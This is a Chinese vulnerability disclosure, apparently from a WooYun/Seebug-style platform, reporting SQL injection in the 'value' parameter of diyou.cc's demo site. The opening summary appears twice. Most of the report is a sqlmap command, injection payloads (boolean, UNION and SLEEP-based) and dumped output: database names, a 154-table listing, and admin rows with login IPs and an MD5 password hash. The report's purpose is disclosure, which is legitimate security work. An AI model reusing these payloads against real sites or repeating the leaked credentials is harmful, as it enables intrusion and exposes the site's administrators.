### 简要描述: 不描述了,忙着去改金额=。= ### 详细说明: ``` 注入点:http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 ``` GET参数value未有效过滤导致存在注入 这是你们家的官网产品演示站对吧? 通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复! ``` python sqlmap.py -u "http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1" --batch -p "value" --dbs sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: value Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND 4357=4357 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 UNION ALL SELECT NULL,CONCAT(0x71666b6271,0x59784658734a4b746348,0x7165616971),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload:...
### 简要描述: 不描述了,忙着去改金额=。= ### 详细说明: ``` 注入点:http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 ``` GET参数value未有效过滤导致存在注入 这是你们家的官网产品演示站对吧? 通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复! ``` python sqlmap.py -u "http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1" --batch -p "value" --dbs sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: value Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND 4357=4357 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 UNION ALL SELECT NULL,CONCAT(0x71666b6271,0x59784658734a4b746348,0x7165616971),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND SLEEP(5) --- [21:47:58] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6.0 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL 5.0.11 [21:47:58] [INFO] fetching database names available databases [2]: [*] information_schema [*] www.diyou.cc Database: www.diyou.cc +-------------------+---------+ | Table | Entries | +-------------------+---------+ | diyou_users | 739 | | diyou_users_admin | 40 | | ... | ... | +-------------------+---------+ Database: www.diyou.cc [154 tables] +-----------------------------+ | diyou_account | | diyou_account_balance | | diyou_account_bank | | diyou_account_cash | | diyou_account_fee | | diyou_account_fee_type | | diyou_account_log | | diyou_account_payment | | diyou_account_recharge | | diyou_account_users | | diyou_account_users_bank | | diyou_account_web | | diyou_approve | | diyou_approve_edu | | diyou_approve_edu_id5 | | diyou_approve_id5 | | diyou_approve_realname | | diyou_approve_sms | | diyou_approve_smslog | | diyou_approve_video | | diyou_areas | | diyou_articles | | diyou_articles_pages | | diyou_articles_type | | diyou_attestations | | diyou_attestations_type | | diyou_attestations_user | | diyou_borrow | | diyou_borrow_activity | | diyou_borrow_amount | | diyou_borrow_amount_apply | | diyou_borrow_amount_log | | diyou_borrow_amount_type | | diyou_borrow_apply | | diyou_borrow_auto | | diyou_borrow_autolog | | diyou_borrow_care | | diyou_borrow_change | | diyou_borrow_count | | diyou_borrow_count_log | | diyou_borrow_credit | | diyou_borrow_fee | | diyou_borrow_fee_loan | | diyou_borrow_fee_log | | diyou_borrow_fee_type | | diyou_borrow_flag | | diyou_borrow_frost | | diyou_borrow_newtype | | diyou_borrow_preview | | diyou_borrow_recover | | diyou_borrow_repay | | diyou_borrow_roam | | diyou_borrow_style | | diyou_borrow_tender | | diyou_borrow_tender_auto | | diyou_borrow_tender_autolog | | diyou_borrow_tender_web | | diyou_borrow_type | | diyou_borrow_verify | | diyou_borrow_vouch | | diyou_borrow_vouch_recover | | diyou_borrow_vouch_repay | | diyou_comment | | diyou_comments | | diyou_credit | | diyou_credit_class | | diyou_credit_log | | diyou_credit_rank | | diyou_credit_type | | diyou_dw_activity_review | | diyou_email | | diyou_email_log | | diyou_email_port | | diyou_email_sendlog | | diyou_group | | diyou_group_articles | | diyou_group_comments | | diyou_group_log | | diyou_group_member | | diyou_group_type | | diyou_linkages | | diyou_linkages_class | | diyou_linkages_type | | diyou_links | | diyou_links_type | | diyou_message | | diyou_message_receive | | diyou_modules | | diyou_phone | | diyou_phone_log | | diyou_phone_port | | diyou_phone_smslog | | diyou_rating_assets | | diyou_rating_company | | diyou_rating_contact | | diyou_rating_educations | | diyou_rating_finance | | diyou_rating_houses | | diyou_rating_info | | diyou_rating_job | | diyou_remind | | diyou_remind_log | | diyou_remind_type | | diyou_remind_user | | diyou_scrollpic | | diyou_scrollpic_type | | diyou_site | | diyou_site_menu | | diyou_sms_type | | diyou_spread_add | | diyou_spread_log | | diyou_spreads_log | | diyou_spreads_set | | diyou_spreads_users | | diyou_sysauto_auto | | diyou_sysauto_log | | diyou_system | | diyou_system_type | | diyou_trust | | diyou_trust_borrow | | diyou_trust_cash | | diyou_trust_gopay | | diyou_trust_ips | | diyou_trust_recharge | | diyou_trust_repay | | diyou_trust_tender | | diyou_ucenter | | diyou_ucenter_set | | diyou_users | | diyou_users_admin | | diyou_users_admin_login | | diyou_users_admin_type | | diyou_users_adminlog | | diyou_users_care | | diyou_users_care_user | | diyou_users_email | | diyou_users_email_log | | diyou_users_examines | | diyou_users_friends | | diyou_users_friends_invite | | diyou_users_friends_type | | diyou_users_info | | diyou_users_log | | diyou_users_qq | | diyou_users_rebut | | diyou_users_reglog | | diyou_users_return_log | | diyou_users_set | | diyou_users_sina | | diyou_users_type | | diyou_users_upfiles | | diyou_users_vip | | diyou_users_viplog | | diyou_users_visit | +-----------------------------+ database: www.diyou.cc table: diyou_users_admin [22:32:07] [INFO] resumed: 222.79.78.248 [22:32:07] [INFO] resumed: 1399448942 [22:32:07] [INFO] resumed: 2114 [22:32:07] [INFO] resumed: 320cb834bb58ab7d63ca5f8a21729988 [22:32:26] [INFO] resumed: 1 [22:32:26] [INFO] resumed: 120.36.190.40 [22:32:26] [INFO] resumed: 1398240030 [22:32:26] [INFO] resumed: 1 [22:32:26] [INFO] resumed: 127.0.0.1 [22:32:26] [INFO] resumed: 1386036527 ..................................... id | user_id | type_id | qq | city | addip | phone | remark | purview | addtime | province | login_ip | password | adminname | update_ip | login_time | logintimes | update_time | +----+---------+---------+---------+------+-----------+---------+---------+---------+------------+----------+---------------+----------------------------------+-----------+---------------+------------+------------+-------------+ | 1 | 1 | 1 | <blank> | 1326 | <blank> | <blank> | <blank> | <blank> | <blank> | 1310 | 222.79.78.248 | 320cb834bb58ab7d63ca5f8a21729988 ..................................... 射出数据,只是时间问题,这里我就不跑了! ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201405/07221450c06dfdf38e4147325131c83d0a35494b.jpg" alt="QQ图片20140507215948.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/07221450c06dfdf38e4147325131c83d0a35494b.jpg)
查看更多
